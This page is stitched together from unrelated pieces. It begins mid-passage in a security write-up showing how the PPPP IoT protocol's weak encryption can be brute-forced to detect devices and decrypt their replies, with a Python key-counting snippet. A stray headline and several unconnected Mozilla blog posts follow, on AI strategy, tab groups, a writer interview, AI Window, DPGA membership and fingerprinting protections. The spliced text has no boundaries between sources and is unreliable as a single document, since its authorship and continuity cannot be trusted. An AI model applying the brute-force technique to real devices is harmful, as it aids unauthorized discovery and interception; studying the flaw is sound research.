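        if s > 127 * MAX_LEN:                  # ASCII keys can't sum this high
            continue
        lo = math.ceil((s - 2 * MAX_LEN) / 3)  # lower bound before mod 256
        hi = s // 3                            # upper bound before mod 256
        for v in range(max(lo, 0), hi + 1):
            values.add(v % 256)
    return values

# 64 possible k4 values per k1; k2 is fully determined by k1.
total = sum(len(possible_k3(k1)) * 64 for k1 in range(256))
print(total)
```

Each $k_1$ ends up with exactly 33 admissible $k_3$ values, matching the derivation.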
Not all effective keys are equally likely however: the $k_3$ values at the outer edges of the possible range are very unlikely. So one could prioritize the keys by probability – if the total number weren’t already low enough to render this exercise moot.
How many ciphertexts is that?
We have the four-byte plaintext F1 30 00 00 and we have 540,672 possible effective keys. How many ciphertexts does this translate to? With any reasonable encryption scheme the answer would be: slightly fewer than 540,672, due to a few unlikely collisions.
But PPPP doesn’t use a reasonable encryption scheme. With merely four bytes of plaintext there is a significant chance that PPPP will only use part of the effective key for encryption, resulting in identical ciphertexts for every key sharing that part. I didn’t bother analyzing this possibility mathematically; my script simply generated all possible ciphertexts. So the exact answer is: 540,672 effective keys produce 157,092 ciphertexts.
And that’s why you should leave cryptography to experts.
Understanding the response
Now let’s say we send 157,092 encrypted requests. An encrypted response comes back. How do we decrypt it without knowing which of the requests was accepted?
All PPPP packets start with the magic byte F1, so the first byte of our response’s plaintext must be F1 as well. The “encryption” scheme used by PPPP allows translating that knowledge directly into the value of $k_1$. Now one could probably (definitely) guess more plaintext parts and with some clever tricks deduce the rest of the effective key. But there are only $33 \cdot 64 = 2{,}112$ possible effective keys for each value of $k_1$ anyway. It’s much easier to simply try out all 2,112 possibilities and see which one results in a response that makes sense.
The response here is 24 bytes large, making ambiguous decryptions less likely. Still, my experiments show that in approximately 4% of the cases closely related keys will produce valid but different decryption results. So you will get two or more similar device IDs and any one of them could be correct. I don’t think that this ambiguity can be resolved without further communication with the device, but at least with my changes the script reliably detects when a PPPP device is present on the network.
Firefox becomes an AI browser, but Mozilla promises an ‘off switch’ for those who don’t want it - Clickx
Rewiring Mozilla: Doing for AI what we did for the web
AI isn’t just another tech trend — it’s at the heart of most apps, tools and technology we use today. It enables remarkable things: new ways to create and collaborate and communicate. But AI is also letting us down, filling the internet with slop, creating huge social and economic risks — and further concentrating power over how tech works in the hands of a few.
This leaves us with a choice: push the trajectory of AI in a direction that’s good for humanity — or just let the slop pour out and the monopolies grow. For Mozilla, the choice is clear. We choose humanity.
Mozilla has always been focused on making the internet a better place. Which is why pushing AI in a different direction than it’s currently headed is the core focus of our strategy right now. As AI becomes a fundamental component of everything digital — everything people build on the internet — it’s imperative that we step in to shape where it goes.
This post is the first in a series that will lay out Mozilla’s evolving strategy to do for AI what we did for the web.
What did we do for the web?
Twenty-five years ago, Microsoft Internet Explorer had 95% browser market share — controlling how most people saw the internet, and who could build what and on what terms. Mozilla was born to change this. Firefox challenged Microsoft’s monopoly control of the web, and dropped Internet Explorer’s market share to 55% in just a few short years.
The result was a very different internet. For most people, the internet was different because Firefox made it faster and richer — and blocked the annoying pop-up ads that were pervasive at the time. It did even more for developers: Firefox was a rocketship for the growth of open standards and open source, decentralizing who controlled the technology used to build things on the internet. This ushered in the web 2.0 era.
How did Mozilla do this? By building a non-profit tech company around the values in the Mozilla Manifesto — values like privacy, openness and trust. And by gathering a global community of tens of thousands — a rebel alliance of sorts — to build an alternative to the big tech behemoth of the time.
What does success look like?
This is what we intend to do again: grow an alliance of people, communities and companies who envision — and want to build — a different future for AI.
What does ‘different’ look like? There are millions of good answers to this question. If your native tongue isn’t a major internet language like English or Chinese, it might be AI that has nuance in the language you speak. If you are a developer or a startup, it might be having open source AI building blocks that are affordable, flexible and let you truly own what you create. And if you are, well, anyone, it’s probably apps and services that become more useful and delightful as they add AI — and that are genuinely trustworthy and respectful of who we are as humans. The common threads: agency, diversity, choice.
Our task is to create a future for AI that is built around these values. We’ve started to rewire Mozilla to take on this task — and developed a new strategy focused just as much on AI as it is on the web. At the heart of this strategy is a double bottom line framework — a way to measure our progress against both mission and money:
Double bottom line

Mission:
- In the world: Empower people with tech that promotes agency and choice – make AI for and about people. Build AI that puts humanity first.
- In Mozilla: 100% of Mozilla orgs building AI that advances the Mozilla Manifesto.

Money:
- In the world: Decentralize the tech industry – and create a tech ecosystem where the ‘people part’ of AI can flourish.
- In Mozilla: Radically diversify our revenue. 20% yearly growth in non-search revenue. 3+ companies with $25M+ revenue.
Mozilla has always had an implicit double bottom line. The strategy we developed this year makes this double bottom line explicit — and ties it back to making AI more open and trustworthy. Over the next three years, all of the organizations in Mozilla’s portfolio will design their strategies — and measure their success — against this double bottom line.
What will we build?
As we’ve rewired Mozilla, we’ve not only laid out a new strategy — we have also brought in new leaders and expanded our portfolio of responsible tech companies. This puts us on a strong footing. The next step is the most important one: building new things — real technology and products and services that start to carve a different path for AI.
While it is still early days, all of the organizations across Mozilla are well underway with this piece of the puzzle. Each is focused on at least one of three areas of focus in our strategy:
Open source AI — for developers
Focus: grow a decentralized open source AI ecosystem that matches the capabilities of Big AI — and that enables people everywhere to build with AI on their own terms.
Early examples: Mozilla.ai’s Choice First Stack, a unified open-source stack that simplifies building and testing modern AI agents. Also, llamafile for local AI.

Public interest AI — by and for communities
Focus: work with communities everywhere to build technology that reflects their vision of how AI and tech should work, especially where the market won’t build it for them.
Early examples: the Mozilla Data Collective, home to Common Voice, which makes it possible to train and tune AI models in 300+ languages, accents and dialects.

Trusted AI experiences — for everyone
Focus: create trusted AI-driven products that give people new ways to interact with the web — with user choice and openness as guiding principles.
Early examples: recent Firefox AI experiments, which will evolve into AI Window in early 2026 — offering an opt-in way to choose models and add AI features in a browser you trust.
The classic versions of Firefox and Thunderbird are still at the heart of what Mozilla does. These remain our biggest areas of investment — and neither of these products will force you to use AI. At the same time, you will see much more from Mozilla on the AI front in coming years. And, you will see us invest in other double bottom line companies trying to point AI in a better direction.
We need to do this — together
These are the stakes: if we can’t push AI in a better direction, the internet — a place where 6 billion of us now spend much of our lives — will get much, much worse. If we want to shape the future of the web and the internet, we also need to shape the future of AI.
For Mozilla, whether or not to tackle this challenge isn’t a question anymore. We need to do this. The question is: how? The high level strategy that I’ve laid out is our answer. It doesn’t prescribe all the details — but it does give us a direction to point ourselves and our resources. Of course, we know there is still a HUGE amount to figure out as we build things — and we know that we can’t do this alone.
Which means it’s incredibly important to figure out: who can we walk beside? Who are our allies? There is a growing community of people who believe the internet is alive and well — and who are dedicating themselves to bending the future of AI to keep it that way. They may not all use the same words or be building exactly the same thing, but a rebel alliance of sorts is gathering. Mozilla sees itself as part of this alliance. Our plan is to work with as many of you as possible. And to help the alliance grow — and win — just as we did in the web era.
You can read the full strategy document here. Next up in this series: Building A LAMP Stack for AI. Followed by: A Double Bottom Line for Tech and The Mozilla Manifesto in the Era of AI.
The post Rewiring Mozilla: Doing for AI what we did for the web appeared first on The Mozilla Blog.
Firefox tab groups just got an upgrade, thanks to your feedback
Tab groups have become one of Firefox’s most loved ways to stay organized — over 18 million people have used the feature since it launched earlier this year. Since then, we’ve been listening closely to feedback from the Mozilla Connect community to make this long-awaited feature even more helpful.
We’ve just concluded a round of highly requested tab groups updates that make it easier than ever to stay focused, organized, and productive. Check out what we’ve been up to, and if you haven’t tried tab groups yet, here’s a helpful starting guide.
Preview tab group contents on hover
Starting in Firefox 145, you can peek inside a group without expanding it. Whether you’re checking a stash of tabs set aside for deep research or quickly scanning a group to find the right meeting notes doc, hover previews give you the context you need — instantly.
Keep the active tab visible in a collapsed group — and drag tabs into it
Since Firefox 142, when you collapse a group, the tab you’re working in remains visible. It’s a small but mighty improvement that reduces interruptions. And, starting in Firefox 143, you can drag a tab directly into a collapsed group without expanding it. It’s a quick, intuitive way to stay organized while reducing on-screen clutter.
Each of these ideas came from your feedback on Mozilla Connect. We’re grateful for your engagement, creativity, and patience as our team works to improve Tab Groups.
What’s next for tab groups
We’ve got a big, healthy stash of great ideas and suggestions to explore, but we’d love to hear more from you on two areas of long-term interest:
- Improving the usefulness and ease of use of saved tab groups. We’re curious how you’re using them and how we can make the experience more helpful to you. What benefits do they bring to your workflow compared to bookmarks?
- Workspaces. Some of you have requested a way to separate contexts by creating workspaces — sets of tabs and tab groups that are entirely isolated from each other, yet remain available within a single browser window. We are curious about your workspace use cases and where context separation via window management or profiles doesn’t meet your workflow needs. Is collaboration an important feature of the workspaces for you?
Have ideas and suggestions? Let us know in this Mozilla Connect thread!
The post Firefox tab groups just got an upgrade, thanks to your feedback appeared first on The Mozilla Blog.
The writer behind ‘Diary of a Sad Black Woman’ on making space for feelings online
Here at Mozilla, we are the first to admit the internet isn’t perfect, but we know the internet is pretty darn magical. The internet opens up doors and opportunities, allows for human connection, and lets everyone find where they belong — their corners of the internet. We all have an internet story worth sharing. In My Corner Of The Internet, we talk with people about the online spaces they can’t get enough of, the sites and forums that shaped them, and how they would design their own corner of the web.
We caught up with Jacque Aye, the author behind “Diary of a Sad Black Woman.” She talks about blogging culture, writing fiction for “perpetually sighing adults” and Lily Allen’s new album.
What is an internet deep dive that you can’t wait to jump back into?
Right now, I’m deep diving into Lily Allen’s newest album! Not for the gossip, although there’s plenty of that to dive into, but for the psychology behind it all. I appreciate creatives who share so vulnerably but in nuanced and honest ways. Sharing experiences is what makes us feel human, I think. The way she outlined falling in love, losing herself, struggling with insecurities, and feeling numb was so relatable to me. Now, would I share as many details? Probably not. But I do feel her.
What was the first online community you engaged with?
Blogger. I was definitely a Blogger baby, and I used to share my thoughts and outfits there, the same way I currently share on Substack. I sometimes miss those times and my little oversharing community. Most people didn’t really have personal brands then, so everything felt more authentic, anonymous and free.
What is the one tab you always regret closing?
Substack! I always find the coolest articles, save the tab, then completely forget I meant to read it, ahhhh.
What can you not stop talking about on the internet right now?
I post about my books online to an obsessive and almost alarming degree, ha. I’ve been going on and on about my weird, whimsical, and woeful novels, and people seem to resonate with that. I describe my work as Lemony Snicket meets a Boots Riley movie, but for perpetually sighing adults. I also never, ever shut up about my feelings. You can even read my diary online. For free. On Substack.
If you could create your own corner of the internet, what would it look like?
I feel super lucky to have my own little corner of the internet! In my corner, we love wearing cute outfits, listening to sad girl music, watching Tim Burton movies, and reading about flawed women going through absurd trials.
What articles and/or videos are you waiting to read/watch right now?
I can’t wait to settle in and watch Knights of Guinevere! It looks so, so good, and I adore the creator.
What is your favorite corner of the internet?
This will seem so random, but right now, besides Substack, I’m really loving Threads. People are so vulnerable on there, and so willing to share personal stories and ask for help and advice. I love any space where I can express the full range of my feelings… and also share my books and outfits, ha.
How do you imagine the next version of the internet supporting creators who lead with emotion and care?
I really hope the next version of the internet reverts back to the days of Blogger and Tumblr. Where people could design their spaces how they see fit, integrate music and spew their hearts out without all the judgment.
Jacque Aye is an author and writes “Diary of a Sad Black Woman” on Substack. As a woman who suffers from depression and social anxiety, she’s made it her mission to candidly share her experiences with the hopes of helping others dealing with the same. This extends into her fiction work, where she pens tales about woeful women trying their best, with a surrealist, magical touch. Inspired by authors like Haruki Murakami, Sayaka Murata, and Lemony Snicket, Jacque’s stories are dark, magical, and humorous with a hint… well, a bunch… of absurdity.
The post The writer behind ‘Diary of a Sad Black Woman’ on making space for feelings online appeared first on The Mozilla Blog.
Introducing AI, the Firefox way: A look at what we’re working on and how you can help shape it
We recently shared how we are approaching AI in Firefox — with user choice and openness as our guiding principles. That’s because we believe AI should be built like the internet — open, accessible, and driven by choice — so that users and the developers helping to build it can use it as they wish, help shape it and truly benefit from it.
In Firefox, you’ll never be locked into one ecosystem or have AI forced into your browsing experience. You decide when, how or whether to use it at all. You’ve already seen this approach in action through some of our latest features like the AI chatbot in the sidebar for desktop or Shake to Summarize on iOS.
Now, we’re excited to invite you to help shape the work on our next innovation: an AI Window. It’s a new, intelligent and user-controlled space we’re building in Firefox that lets you chat with an AI assistant and get help while you browse, all on your terms. It’s completely opt-in and fully under your control; if you try it and find it’s not for you, you can switch it off.
As always, we’re building in the open — and we want to build this with you. Starting today, you can sign up to receive updates on our AI Window and be among the first to try it and give us feedback.
We’re building a better browser, not an agenda
We see a lot of promise in AI browser features making your online experience smoother, more helpful, and free from the everyday disruptions that break your flow. But browsers made by AI companies ask you to make a hard choice — either use AI all the time or don’t use it at all.
We’re focused on making the best browser, which means recognizing that everyone has different needs. For some, AI is part of everyday life. For others, it’s useful only occasionally. And many are simply curious about what it can offer, but unsure where to start.
Regardless of your choice, with Firefox, you’re in control.
You can continue using Firefox as you always have for the most customizable experience, or switch from classic to Private Window for the most private browsing experience. And now, with AI Window, you have the option to opt in to our most intelligent and personalized experience yet — providing you with new ways to interact with the web.
Why is investing in AI important for Firefox?
With AI becoming a more widely adopted interface to the web, the principles of transparency, accountability, and respect for user agency are critical to keeping it free, open, and accessible to all. As an independent browser, we are well positioned to uphold these principles.
While others are building AI experiences that keep you locked in a conversational loop, we see a different path — one where AI serves as a trusted companion, enhancing your browsing experience and guiding you outward to the broader web.
We believe standing still while technology moves forward doesn’t benefit the web or humanity. That’s why we see it as our responsibility to shape how AI integrates into the web — in ways that protect and give people more choice, not less.
Help us shape the future of the web
Our success has always been driven by our community of users and developers, and we’ll continue to rely on you as we explore how AI can serve the web — without ever losing focus on our commitment to build what matters most to our users: a Firefox that remains fast, secure and private.
Join us by contributing to open-source projects and sharing your ideas on Mozilla Connect.
Mozilla joins the Digital Public Goods Alliance, championing open source to drive global progress
Today, Mozilla is thrilled to join the Digital Public Goods Alliance (DPGA) as its newest member. The DPGA is a UN-backed initiative that seeks to advance open technologies and ensure that technology is put to use in the public interest and serves everyone, everywhere — like Mozilla’s Common Voice, which has been recognized as a Digital Public Good (DPG). This announcement comes on the heels of a big year of digital policy-making globally, where Mozilla has been at the forefront in advocating for open source AI across Europe, North America and the UK.
The DPGA is a multi-stakeholder initiative with a mission to accelerate the attainment of the Sustainable Development Goals (SDGs) “by facilitating the discovery, development, use of and investment in digital public goods.” Digital public goods are open-source technology, open data, open and transparent AI models, open standards and open content that adhere to privacy safeguards, the do-no-harm principle, and other best practices.
This is deeply aligned with Mozilla’s mission. It creates a natural opportunity for collaboration and shared advocacy in the open ecosystem, with allies and like-minded builders from across the globe. As part of the DPGA’s Annual Roadmap for 2025, Mozilla will focus on three work streams:
- Promoting DPGs in the Open Source Ecosystem: Mozilla has long championed open-source, public-interest technology as an alternative to profit-driven development. Through global advocacy, policy engagement, and research, we highlight the societal and economic value of open source, especially in AI. Through our work in the DPGA, we’ll continue pushing for better enabling conditions and funding opportunities for open-source, public-interest technology.
- DPGs and Digital Commons: Mozilla develops and maintains a range of open source projects through our various entities. These include Common Voice, a digital public good with over 33,000 hours of multilingual voice data, and applications like the Firefox web browser and Thunderbird email client. Mozilla also supports open-source AI through our product work, including by Mozilla.ai, and our venture fund, Mozilla Ventures.
- Funding Open Source & Public Interest Technology: Grounded in our own open-source roots, Mozilla will continue to fund open source technologies that help to untangle thorny sociotechnical issues. We’ve fueled a broad and impactful portfolio of technical projects. Beginning in the fall of 2025, we will introduce our latest grantmaking program: an incubator that will help community-driven projects find “product-community fit” in order to attain long-term sustainability.
We hope to use our membership to share research, tooling, and perspectives with a like-minded audience and partner with the DPGA’s diverse community of builders and allies.
“Open source AI and open data aren’t just about tech,” said Mark Surman, president of Mozilla. “They’re about access to technology and progress for people everywhere. As a double-bottom-line, mission-driven enterprise, Mozilla is proud to be part of the DPGA and excited to work toward our joint mission of advancing open-source, trustworthy technology that puts people first.”
To learn more about DPGA, visit https://digitalpublicgoods.net.
Firefox expands fingerprint protections: advancing towards a more private web
With Firefox 145, we’re rolling out major privacy upgrades that take on browser fingerprinting — a pervasive and hidden tracking technique that lets websites identify you even when cookies are blocked or you’re in private browsing. These protections build on Mozilla’s long-term goal of building a healthier, transparent and privacy-preserving web ecosystem.
Fingerprinting builds a secret digital ID of you by collecting subtle details of your setup — ranging from your time zone to your operating system settings — that together create a “fingerprint” identifiable across websites and across browser sessions. Having a unique fingerprint means fingerprinters can identify you continuously and invisibly, allowing bad actors to track you without your knowledge or consent. Online fingerprinting can follow you for months, even in any browser’s private browsing mode.
Protecting people’s privacy has always been core to Firefox. Since 2020, Firefox’s built-in Enhanced Tracking Protection (ETP) has blocked known trackers and other invasive practices, while features like Total Cookie Protection and now expanded fingerprinting defenses demonstrate a broader goal: prioritizing your online freedom through innovative privacy-by-design. Since 2021, Firefox has been incrementally enhancing anti-fingerprinting protections targeting the most common pieces of information collected for suspected fingerprinting uses.
Today, we are excited to announce the completion of the second phase of defenses against fingerprinters that linger across all your browsing but aren’t in the known tracker lists. With these fingerprinting protections, the number of Firefox users trackable by fingerprinters is cut in half.
How we built stronger defenses
Drawing from a global analysis of how real people’s browsers can be fingerprinted, Mozilla has developed new, unique and powerful defenses against real-world fingerprinting techniques. Firefox is the first browser with this level of insight into fingerprinting and the most effective deployed defenses to reduce it. Like Total Cookie Protection, one of our most innovative privacy features, these new defenses are debuting in Private Browsing Mode and ETP Strict mode initially, while we work to enable them by default.
How Firefox protects you
These fingerprinting protections work on multiple layers, building on Firefox’s already robust privacy features. For example, Firefox has long blocked known tracking and fingerprinting scripts as part of its Enhanced Tracking Protection.
Beyond blocking trackers, Firefox also limits the information it makes available to websites — a privacy-by-design approach — that preemptively shrinks your fingerprint. Browsers provide a way for websites to ask for information that enables legitimate website features, e.g. your graphics hardware information, which allows sites to optimize games for your computer. But trackers can also ask for that information, for no other reason than to help build a fingerprint of your browser and track you across the web.
Since 2021, Firefox has been incrementally advancing fingerprinting protections, covering the most pervasive fingerprinting techniques. These include things like how your graphics card draws images, which fonts your computer has, and even tiny differences in how it performs math. The first phase plugged the biggest and most-common leaks of fingerprinting information.
Recent Firefox releases have tackled the next-largest leaks of user information used by online fingerprinters. This ranges from strengthening the font protections to preventing websites from learning hardware details like the number of cores your processor has, the number of simultaneous fingers your touchscreen supports, and the dimensions of your dock or taskbar. The full list of detailed protections is available in our documentation.
Our research shows these improvements cut the percentage of users seen as unique by almost half.
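The arithmetic behind uniqueness helps explain why shrinking even a few attributes matters so much. An attribute shared by one in N users contributes about log2(N) bits of identifying information, and roughly 33 bits are enough to single out one person among 8 billion. A back-of-the-envelope sketch, using invented rarity numbers rather than measured ones:

```javascript
// Illustrative entropy arithmetic (the 1-in-N rarities are made up,
// not measurements): an attribute shared by 1-in-N users contributes
// about log2(N) bits of identifying information.
const bits = (oneInN) => Math.log2(oneInN);

const signals = {
  timezone: bits(24),    // ~4.6 bits
  screenSize: bits(50),  // ~5.6 bits
  cpuCores: bits(8),     //  3.0 bits
  fontList: bits(4000),  // ~12.0 bits
  touchPoints: bits(4),  //  2.0 bits
};

// Independent signals add up: about 27 bits already from five attributes.
const totalBits = Object.values(signals).reduce((sum, b) => sum + b, 0);
```

Since about 33 bits suffice to single out one person, trimming or coarsening a handful of these vectors, as the new protections do, pushes many users back below the uniqueness threshold.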
Firefox’s new protections are a balance of disrupting fingerprinters while maintaining web usability. More aggressive fingerprinting blocking might sound better, but is guaranteed to break legitimate website features. For instance, calendar, scheduling, and conferencing tools legitimately need your real time zone. Firefox’s approach is to target the leakiest fingerprinting vectors (the tricks and scripts used by trackers) while preserving functionality many sites need to work normally. The end result is a set of layered defenses that significantly reduce tracking without downgrading your browsing experience. Our documentation details both the specific behaviors and how to recognize a problem on a site and disable protections for that site alone, so you always stay in control. The goal: strong privacy protections that don’t get in your way.
What’s next for your privacy
If you open a Private Browsing window or use ETP Strict mode, Firefox is already working behind the scenes to make you harder to track. The latest phase of Firefox’s fingerprinting protections marks an important milestone in our mission to deliver smart privacy protections that work automatically — no further extensions or configuration needed. As we head into the future, Firefox remains committed to fighting for your privacy, so you get to enjoy the web on your terms. Upgrade to the latest Firefox and take back control of your privacy.
